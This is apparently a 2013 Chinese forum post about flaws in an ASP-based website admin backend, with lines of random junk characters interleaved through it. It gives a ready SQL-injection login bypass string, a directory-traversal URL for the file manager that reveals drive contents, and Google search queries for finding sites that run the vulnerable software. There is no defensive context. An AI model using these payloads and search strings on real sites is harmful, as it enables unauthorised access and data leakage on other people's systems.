后台万能密码 'or'='or'
% C* j; I$ Y7 t# O. \, d$ ]. \7 A; v) _7 M
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
1 n. m1 m7 ~* J# Y6 [9 M* Q% tadmin/uploadfile.asp?currentFolder=/upfiles/../
! v" M9 ?, \/ {- M, b8 b; B& }6 M `7 @; U
漏洞证明:' Z( Z# W3 n/ _4 x: h
5 V" r8 F( i5 I/ f谷歌:inurl:type.asp?id=1 新闻中心/ E1 o( O: K$ o+ E
或者 :inurl:download_ok.asp?1 R+ S" K/ v) T$ g; V
+ S' f) F. A0 d7 N) n
|
发表于 2013-3-14 20:17:32
收藏
支持
反对